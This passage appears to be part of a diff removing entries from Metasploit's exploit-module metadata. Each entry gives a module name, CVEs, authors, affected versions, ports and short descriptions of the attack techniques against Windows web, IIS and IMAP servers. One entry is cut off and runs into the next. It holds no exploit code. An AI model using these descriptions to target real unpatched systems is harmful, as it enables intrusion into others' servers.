This module has been tested\n successfully on Windows 7 SP1 x86.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "VX Search Enterprise v9.5.12" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/vxsrchs_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/vxsrchs_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/webster_http": { - "name": "Webster HTTP Server GET Buffer Overflow", - "fullname": "exploit/windows/http/webster_http", - "aliases": [], - "rank": 200, - "disclosure_date": "2002-12-02", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This exploits a stack buffer overflow in the Webster HTTP server.\n The server and source code was released within an article from\n the Microsoft Systems Journal in February 1996 titled \"Write a\n Simple HTTP-based Server Using MFC and Windows Sockets\".", - "references": [ - "CVE-2002-2268", - "OSVDB-44106", - "BID-6289", - "URL-http://www.microsoft.com/msj/archive/s25f.aspx", - "URL-http://www.netdave.com/webster/webster.htm" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows XP SP0", - "Debug" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/webster_http.rb", - "is_install_path": true, - "ref_name": "windows/http/webster_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ws_ftp_rce_cve_2023_40044": { - 
"name": "Progress Software WS_FTP Unauthenticated Remote Code Execution", - "fullname": "exploit/windows/http/ws_ftp_rce_cve_2023_40044", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-09-27", - "type": "exploit", - "author": [ - "sfewer-r7" - ], - "description": "This module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code\n execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP Server\n prior to 2020.0.4 (version 8.7.4) and 2022.0.2 (version 8.8.2) are vulnerable to this issue. The vulnerability\n was originally discovered by AssetNote.", - "references": [ - "CVE-2023-40044", - "URL-https://attackerkb.com/topics/bn32f9sNax/cve-2023-40044/rapid7-analysis", - "URL-https://community.progress.com/s/article/WS-FTP-Server-Critical-Vulnerability-September-2023", - "URL-https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows" - ], - "mod_time": "2023-10-04 09:39:25 +0000", - "path": "/modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb", - "is_install_path": true, - "ref_name": "windows/http/ws_ftp_rce_cve_2023_40044", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/xampp_webdav_upload_php": { - "name": "XAMPP WebDAV PHP Upload", - "fullname": "exploit/windows/http/xampp_webdav_upload_php", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-01-14", - "type": "exploit", - "author": [ - "theLightCosine " - ], - "description": 
"This module exploits weak WebDAV passwords on XAMPP servers.\n It uses supplied credentials to upload a PHP payload and\n execute it.", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2018-08-20 18:08:19 +0000", - "path": "/modules/exploits/windows/http/xampp_webdav_upload_php.rb", - "is_install_path": true, - "ref_name": "windows/http/xampp_webdav_upload_php", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/xitami_if_mod_since": { - "name": "Xitami 2.5c2 Web Server If-Modified-Since Overflow", - "fullname": "exploit/windows/http/xitami_if_mod_since", - "aliases": [], - "rank": 200, - "disclosure_date": "2007-09-24", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a stack buffer overflow in the iMatix Corporation\n Xitami Web Server. If a malicious user sends an\tIf-Modified-Since\n header containing an overly long string, it may be possible to\n execute a payload remotely. 
Due to size constraints, this module uses\n the Egghunter technique.", - "references": [ - "CVE-2007-5067", - "OSVDB-40594", - "OSVDB-40595", - "BID-25772", - "EDB-4450" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "xigui32.exe Universal", - "xitami.exe Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/xitami_if_mod_since.rb", - "is_install_path": true, - "ref_name": "windows/http/xitami_if_mod_since", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/zentao_pro_rce": { - "name": "ZenTao Pro 8.8.2 Remote Code Execution", - "fullname": "exploit/windows/http/zentao_pro_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-06-20", - "type": "exploit", - "author": [ - "Daniel Monzón", - "Melvin Boers", - "Erik Wynter" - ], - "description": "This module exploits a command injection vulnerability in ZenTao Pro\n 8.8.2 and earlier versions in order to execute arbitrary commands with\n SYSTEM privileges.\n\n The module first attempts to authenticate to the ZenTao dashboard. It\n then tries to execute the payload by submitting fake repositories via\n the 'Repo Create' function that is accessible from the dashboard via\n CI>Repo. More precisely, the module sends HTTP POST requests to\n '/pro/repo-create.html' that inject commands in the vulnerable 'path'\n parameter which corresponds to the 'Client Path' input field.\n\n Valid credentials for a ZenTao admin account are required. 
This module\n has been successfully tested against ZenTao 8.8.1 and 8.8.2 running on\n Windows 10 (XAMPP server).", - "references": [ - "EDB-48633", - "CVE-2020-7361" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows (x86)", - "Windows (x64)" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/http/zentao_pro_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/zentao_pro_rce", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/zenworks_assetmgmt_uploadservlet": { - "name": "Novell ZENworks Asset Management Remote Execution", - "fullname": "exploit/windows/http/zenworks_assetmgmt_uploadservlet", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-11-02", - "type": "exploit", - "author": [ - "Unknown", - "juan vazquez " - ], - "description": "This module exploits a path traversal flaw in Novell ZENworks Asset Management\n 7.5. 
By exploiting the CatchFileServlet, an attacker can upload a malicious file\n outside of the MalibuUploadDirectory and then make a secondary request that allows\n for arbitrary code execution.", - "references": [ - "CVE-2011-2653", - "OSVDB-77583", - "BID-50966", - "ZDI-11-342", - "URL-http://download.novell.com/Download?buildid=hPvHtXeNmCU~" - ], - "platform": "Java", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Java Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb", - "is_install_path": true, - "ref_name": "windows/http/zenworks_assetmgmt_uploadservlet", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/zenworks_uploadservlet": { - "name": "Novell ZENworks Configuration Management Remote Execution", - "fullname": "exploit/windows/http/zenworks_uploadservlet", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-03-30", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a code execution flaw in Novell ZENworks Configuration Management 10.2.0.\n By exploiting the UploadServlet, an attacker can upload a malicious file outside of the TEMP directory\n and then make a secondary request that allows for arbitrary code execution.", - "references": [ - "CVE-2010-5324", - "OSVDB-63412", - "BID-39114", - "ZDI-10-078", - "URL-http://tucanalamigo.blogspot.com/2010/04/pdc-de-zdi-10-078.html", - "URL-http://www.novell.com/support/kb/doc.php?id=7005573" - ], - "platform": "Java,Linux,Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - 
"Java Universal", - "Windows x86", - "Linux x86" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/zenworks_uploadservlet.rb", - "is_install_path": true, - "ref_name": "windows/http/zenworks_uploadservlet", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/zoho_password_manager_pro_xml_rpc_rce": { - "name": "Zoho Password Manager Pro XML-RPC Java Deserialization", - "fullname": "exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2022-06-24", - "type": "exploit", - "author": [ - "Vinicius", - "Y4er", - "Grant Willcox" - ], - "description": "This module exploits a Java deserialization vulnerability in Zoho ManageEngine Pro\n before 12101 and PAM360 before 5510. Unauthenticated attackers can send a\n crafted XML-RPC request containing malicious serialized data to /xmlrpc to\n gain RCE as the SYSTEM user.", - "references": [ - "CVE-2022-35405", - "URL-https://xz.aliyun.com/t/11578", - "URL-https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html", - "URL-https://archives2.manageengine.com/passwordmanagerpro/12101/ManageEngine_PasswordManager_Pro_12100_to_12101.ppm" - ], - "platform": "Windows", - "arch": "cmd, x64", - "rport": 7272, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows EXE Dropper", - "Windows Command", - "Windows Powershell" - ], - "mod_time": "2022-08-02 14:27:27 +0000", - "path": "/modules/exploits/windows/http/zoho_password_manager_pro_xml_rpc_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/zoho_password_manager_pro_xml_rpc_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - 
"repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ibm/ibm_was_dmgr_java_deserialization_rce": { - "name": "IBM Websphere Application Server Network Deployment Untrusted Data Deserialization Remote Code Execution", - "fullname": "exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-05-15", - "type": "exploit", - "author": [ - "b0yd" - ], - "description": "This module exploits untrusted serialized data processed by the WAS DMGR Server and Cells.\n NOTE: There is a required 2 minute timeout between attempts as the neighbor being added must be reset.", - "references": [ - "CVE-2019-4279", - "URL-https://www-01.ibm.com/support/docview.wss?uid=ibm10883628" - ], - "platform": "Windows", - "arch": "", - "rport": 11006, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Binary", - "CMD" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ibm/ibm_was_dmgr_java_deserialization_rce.rb", - "is_install_path": true, - "ref_name": "windows/ibm/ibm_was_dmgr_java_deserialization_rce", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/iis/iis_webdav_scstoragepathfromurl": { - "name": "Microsoft IIS WebDav ScStoragePathFromUrl Overflow", - "fullname": "exploit/windows/iis/iis_webdav_scstoragepathfromurl", - "aliases": [], - "rank": 0, - "disclosure_date": "2017-03-26", - "type": "exploit", - "author": [ - "Zhiniang Peng", - "Chen Wu", - "Dominic Chell ", - "firefart", - "zcgonvh ", - "Rich Whitcroft", - "Lincoln" - ], - "description": "Buffer overflow in the ScStoragePathFromUrl function\n in the WebDAV service in Internet Information Services (IIS) 6.0\n in Microsoft Windows Server 2003 R2 allows remote attackers to\n execute 
arbitrary code via a long header beginning with\n \"If: " - ], - "description": "This module can be used to execute a payload on IIS servers that\n have world-writeable directories. The payload is uploaded as an ASP\n script via a WebDAV PUT request.\n\n The target IIS machine must meet these conditions to be considered\n as exploitable: It allows 'Script resource access', Read and Write\n permission, and supports ASP.", - "references": [ - "OSVDB-397", - "BID-12141" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2019-05-22 09:05:56 +0000", - "path": "/modules/exploits/windows/iis/iis_webdav_upload_asp.rb", - "is_install_path": true, - "ref_name": "windows/iis/iis_webdav_upload_asp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/iis/ms01_023_printer": { - "name": "MS01-023 Microsoft IIS 5.0 Printer Host Header Overflow", - "fullname": "exploit/windows/iis/ms01_023_printer", - "aliases": [], - "rank": 400, - "disclosure_date": "2001-05-01", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This exploits a buffer overflow in the request processor of the\n Internet Printing Protocol ISAPI module in IIS. 
This module\n works against Windows 2000 Server and Professional SP0-SP1.\n\n If the service stops responding after a successful compromise,\n run the exploit a couple more times to completely kill the\n hung process.", - "references": [ - "CVE-2001-0241", - "OSVDB-3323", - "BID-2674", - "MSB-MS01-023", - "URL-https://seclists.org/lists/bugtraq/2001/May/0005.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2000 SP0-SP1 (Arabic)", - "Windows 2000 SP0-SP1 (Czech)", - "Windows 2000 SP0-SP1 (Chinese)", - "Windows 2000 SP0-SP1 (Dutch)", - "Windows 2000 SP0-SP1 (English)", - "Windows 2000 SP0-SP1 (French)", - "Windows 2000 SP0-SP1 (Finnish)", - "Windows 2000 SP0-SP1 (German)", - "Windows 2000 SP0-SP1 (Korean)", - "Windows 2000 SP0-SP1 (Hungarian)", - "Windows 2000 SP0-SP1 (Italian)", - "Windows 2000 SP0-SP1 (Portuguese)", - "Windows 2000 SP0-SP1 (Spanish)", - "Windows 2000 SP0-SP1 (Swedish)", - "Windows 2000 SP0-SP1 (Turkish)", - "Windows 2000 Pro SP0 (Greek)", - "Windows 2000 Pro SP1 (Greek)" - ], - "mod_time": "2022-07-09 01:36:10 +0000", - "path": "/modules/exploits/windows/iis/ms01_023_printer.rb", - "is_install_path": true, - "ref_name": "windows/iis/ms01_023_printer", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/iis/ms01_026_dbldecode": { - "name": "MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution", - "fullname": "exploit/windows/iis/ms01_026_dbldecode", - "aliases": [], - "rank": 600, - "disclosure_date": "2001-05-15", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module will 
execute an arbitrary payload on a Microsoft IIS installation\n that is vulnerable to the CGI double-decode vulnerability of 2001.\n\n This module has been tested successfully on:\n\n Windows 2000 Professional (SP0) (EN);\n Windows 2000 Professional (SP1) (AR);\n Windows 2000 Professional (SP1) (CZ);\n Windows 2000 Server (SP0) (FR);\n Windows 2000 Server (SP1) (EN); and\n Windows 2000 Server (SP1) (SE).\n\n Note: This module will leave a Metasploit payload exe in the IIS scripts directory.", - "references": [ - "CVE-2001-0333", - "OSVDB-556", - "BID-2708", - "MSB-MS01-026", - "URL-http://marc.info/?l=bugtraq&m=98992056521300&w=2" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows (Dropper)", - "Windows (Command)" - ], - "mod_time": "2022-07-03 18:22:55 +0000", - "path": "/modules/exploits/windows/iis/ms01_026_dbldecode.rb", - "is_install_path": true, - "ref_name": "windows/iis/ms01_026_dbldecode", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/iis/ms01_033_idq": { - "name": "MS01-033 Microsoft IIS 5.0 IDQ Path Overflow", - "fullname": "exploit/windows/iis/ms01_033_idq", - "aliases": [], - "rank": 400, - "disclosure_date": "2001-06-18", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the IDQ ISAPI handler for\n Microsoft Index Server.", - "references": [ - "CVE-2001-0500", - "OSVDB-568", - "MSB-MS01-033", - "BID-2880" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro 
English SP0", - "Windows 2000 Pro English SP1-SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/iis/ms01_033_idq.rb", - "is_install_path": true, - "ref_name": "windows/iis/ms01_033_idq", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/iis/ms02_018_htr": { - "name": "MS02-018 Microsoft IIS 4.0 .HTR Path Overflow", - "fullname": "exploit/windows/iis/ms02_018_htr", - "aliases": [], - "rank": 400, - "disclosure_date": "2002-04-10", - "type": "exploit", - "author": [ - "stinko " - ], - "description": "This exploits a buffer overflow in the ISAPI ISM.DLL used to\n process HTR scripting in IIS 4.0. This module works against\n Windows NT 4 Service Packs 3, 4, and 5. The server will\n continue to process requests until the payload being\n executed has exited. If you've set EXITFUNC to 'seh', the\n server will continue processing requests, but you will have\n trouble terminating a bind shell. 
If you set EXITFUNC to\n thread, the server will crash upon exit of the bind shell.\n The payload is alpha-numerically encoded without a NOP sled\n because otherwise the data gets mangled by the filters.", - "references": [ - "CVE-1999-0874", - "OSVDB-3325", - "BID-307", - "URL-http://www.eeye.com/html/research/advisories/AD19990608.html", - "MSB-MS02-018" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows NT 4.0 SP3", - "Windows NT 4.0 SP4", - "Windows NT 4.0 SP5" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/iis/ms02_018_htr.rb", - "is_install_path": true, - "ref_name": "windows/iis/ms02_018_htr", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/iis/ms02_065_msadc": { - "name": "MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow", - "fullname": "exploit/windows/iis/ms02_065_msadc", - "aliases": [], - "rank": 300, - "disclosure_date": "2002-11-02", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module can be used to execute arbitrary code on IIS servers\n that expose the /msadc/msadcs.dll Microsoft Data Access Components\n (MDAC) Remote Data Service (RDS) DataFactory service. The service is\n exploitable even when RDS is configured to deny remote connections\n (handsafe.reg). The service is vulnerable to a heap overflow where\n the RDS DataStub 'Content-Type' string is overly long. 
Microsoft Data\n Access Components (MDAC) 2.1 through 2.6 are known to be vulnerable.", - "references": [ - "OSVDB-14502", - "BID-6214", - "CVE-2002-1142", - "MSB-MS02-065", - "URL-http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2000 Pro SP0-SP3 (English)", - "Windows 2000 Pro SP0 (Korean)", - "Windows 2000 Pro SP0 (Dutch)", - "Windows 2000 Pro SP0 (Finnish)", - "Windows 2000 Pro SP0 (Turkish)", - "Windows 2000 Pro SP0-SP1 (Greek)", - "Windows 2000 Pro SP1 (Arabic)", - "Windows 2000 Pro SP1 (Czech)", - "Windows 2000 Pro SP2 (French)", - "Windows 2000 Pro SP2 (Portuguese)" - ], - "mod_time": "2022-07-15 00:15:56 +0000", - "path": "/modules/exploits/windows/iis/ms02_065_msadc.rb", - "is_install_path": true, - "ref_name": "windows/iis/ms02_065_msadc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/iis/ms03_007_ntdll_webdav": { - "name": "MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow", - "fullname": "exploit/windows/iis/ms03_007_ntdll_webdav", - "aliases": [], - "rank": 500, - "disclosure_date": "2003-05-30", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This exploits a buffer overflow in NTDLL.dll on Windows 2000\n through the SEARCH WebDAV method in IIS. This particular\n module only works against Windows 2000. 
It should have a\n reasonable chance of success against SP0 to SP3.", - "references": [ - "CVE-2003-0109", - "OSVDB-4467", - "BID-7116", - "PACKETSTORM-30939", - "MSB-MS03-007" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Brute Force" - ], - "mod_time": "2022-07-07 20:31:57 +0000", - "path": "/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb", - "is_install_path": true, - "ref_name": "windows/iis/ms03_007_ntdll_webdav", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/iis/msadc": { - "name": "MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution", - "fullname": "exploit/windows/iis/msadc", - "aliases": [], - "rank": 600, - "disclosure_date": "1998-07-17", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module can be used to execute arbitrary commands on IIS servers\n that expose the /msadc/msadcs.dll Microsoft Data Access Components\n (MDAC) Remote Data Service (RDS) DataFactory service using VbBusObj\n or AdvancedDataFactory to inject shell commands into Microsoft Access\n databases (MDBs), MSSQL databases and ODBC/JET Data Source Name (DSN).\n Based on the msadcs.pl v2 exploit by Rain.Forest.Puppy, which was actively\n used in the wild in the late Ninties. MDAC versions affected include MDAC\n 1.5, 2.0, 2.0 SDK, 2.1 and systems with the MDAC Sample Pages for RDS\n installed, and NT4 Servers with the NT Option Pack installed or upgraded\n 2000 systems often running IIS3/4/5 however some vulnerable installations\n can still be found on newer Windows operating systems. 
Note that newer\n releases of msadcs.dll can still be abused however by default remote\n connections to the RDS is denied. Consider using VERBOSE if you're unable\n to successfully execute a command, as the error messages are detailed\n and useful for debugging. Also set NAME to obtain the remote hostname,\n and METHOD to use the alternative VbBusObj technique.", - "references": [ - "OSVDB-272", - "BID-529", - "CVE-1999-1011", - "MSB-MS98-004", - "MSB-MS99-025" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2022-06-29 19:10:52 +0000", - "path": "/modules/exploits/windows/iis/msadc.rb", - "is_install_path": true, - "ref_name": "windows/iis/msadc", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/imap/eudora_list": { - "name": "Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow", - "fullname": "exploit/windows/imap/eudora_list", - "aliases": [], - "rank": 500, - "disclosure_date": "2005-12-20", - "type": "exploit", - "author": [ - "MC ", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server\n version 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this\n particular vulnerability.\n\n NOTE: The service does NOT restart automatically by default. 
You may be limited to\n only one attempt, so choose wisely!", - "references": [ - "CVE-2005-4267", - "OSVDB-22097", - "BID-15980" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "WorldMail 3 Version 6.1.19.0", - "WorldMail 3 Version 6.1.20.0", - "WorldMail 3 Version 6.1.22.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/eudora_list.rb", - "is_install_path": true, - "ref_name": "windows/imap/eudora_list", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/imail_delete": { - "name": "IMail IMAP4D Delete Overflow", - "fullname": "exploit/windows/imap/imail_delete", - "aliases": [], - "rank": 200, - "disclosure_date": "2004-11-12", - "type": "exploit", - "author": [ - "spoonm " - ], - "description": "This module exploits a buffer overflow in the 'DELETE'\n command of the IMail IMAP4D service. 
This vulnerability\n can only be exploited with a valid username and password.\n This flaw was patched in version 8.14.", - "references": [ - "CVE-2004-1520", - "OSVDB-11838", - "BID-11675" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP sp0 comctl32.dll" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/imail_delete.rb", - "is_install_path": true, - "ref_name": "windows/imap/imail_delete", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/ipswitch_search": { - "name": "Ipswitch IMail IMAP SEARCH Buffer Overflow", - "fullname": "exploit/windows/imap/ipswitch_search", - "aliases": [], - "rank": 200, - "disclosure_date": "2007-07-18", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Ipswitch IMail Server 2006.1 IMAP SEARCH\n verb. 
By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.\n In order for this module to be successful, the IMAP user must have at least one\n message.", - "references": [ - "CVE-2007-3925", - "OSVDB-36219", - "BID-24962" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro SP4 English", - "Windows 2003 SP0 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/ipswitch_search.rb", - "is_install_path": true, - "ref_name": "windows/imap/ipswitch_search", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/mailenable_login": { - "name": "MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow", - "fullname": "exploit/windows/imap/mailenable_login", - "aliases": [], - "rank": 500, - "disclosure_date": "2006-12-11", - "type": "exploit", - "author": [ - "MC " - ], - "description": "MailEnable's IMAP server contains a buffer overflow\n vulnerability in the Login command.", - "references": [ - "CVE-2006-6423", - "OSVDB-32125", - "BID-21492" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "MailEnable 2.35 Pro", - "MailEnable 2.34 Pro" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/mailenable_login.rb", - "is_install_path": true, - "ref_name": "windows/imap/mailenable_login", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/mailenable_status": { - "name": "MailEnable IMAPD (1.54) STATUS Request Buffer Overflow", - "fullname": "exploit/windows/imap/mailenable_status", - "aliases": [], - "rank": 500, - "disclosure_date": "2005-07-13", - 
